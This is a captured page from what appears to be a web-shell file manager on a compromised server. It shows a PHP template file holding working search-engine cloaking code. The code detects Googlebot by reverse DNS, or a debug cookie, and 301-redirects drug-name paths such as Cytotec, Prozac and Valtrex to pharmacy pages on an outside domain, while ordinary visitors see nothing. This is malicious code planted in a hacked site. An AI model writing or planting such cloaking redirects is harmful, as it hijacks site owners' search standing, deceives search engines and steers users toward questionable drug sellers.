0byt3m1n1
Path:
/
data
/
.snapshot
/
daily.2025-04-20_0010
/
templates
/
php
/
[
Home
]
File: no value
<?php $URLS = array ( array('Cytotec.php/1000', 'https://www.ifso.com/med/Cytotec.php'), array('Cytotec.php', 'https://www.ifso.com/med/Cytotec.php'), array('Diflucan.php', 'https://www.ifso.com/med/Diflucan.php'), array('Imitrex.php', 'https://www.ifso.com/med/Imitrex.php'), array('Lisinopril.php', 'https://www.ifso.com/med/Lisinopril.php'), array('Paxil.php', 'https://www.ifso.com/med/Paxil.php'), array('Propecia.php', 'https://www.ifso.com/med/Propecia.php'), array('Prozac.php', 'https://www.ifso.com/med/Prozac.php'), array('Synthroid.php', 'https://www.ifso.com/med/Synthroid.php'), array('Valtrex.php', 'https://www.ifso.com/med/Valtrex.php') ); if(isset($_SERVER['REQUEST_URI']) && isset($_SERVER['HTTP_USER_AGENT']) && isset($_SERVER['REMOTE_ADDR'])) { $redirect_url = get_rurl(trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/')); $remote_addr = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : $_SERVER['REMOTE_ADDR']; if ($redirect_url !== false && (is_gboot($remote_addr) || isset($_COOKIE['botdebug']))) { // header("Link: <$redirect_url>; rel=\"canonical\""); header("Location: $redirect_url", TRUE, 301); exit(); } } function get_rurl($uri) { global $URLS; for($i = 0; $i < count($URLS) ; $i++) { if($URLS[$i][0] == $uri) return $URLS[$i][1]; } return false; } function is_gboot($ip, $ua = 'UA_IS_NOT_SET') { if ($ua !== 'UA_IS_NOT_SET') if (stripos($ua, 'google') === false) return false; $domain = @gethostbyaddr($ip); if ($domain == false || $domain == $ip) return false; if (!(substr($domain, -13) == 'googlebot.com' || substr($domain, -10) == 'google.com')) return false; // if ($ip !== @gethostbyname($domain)) return false; return true; } ?>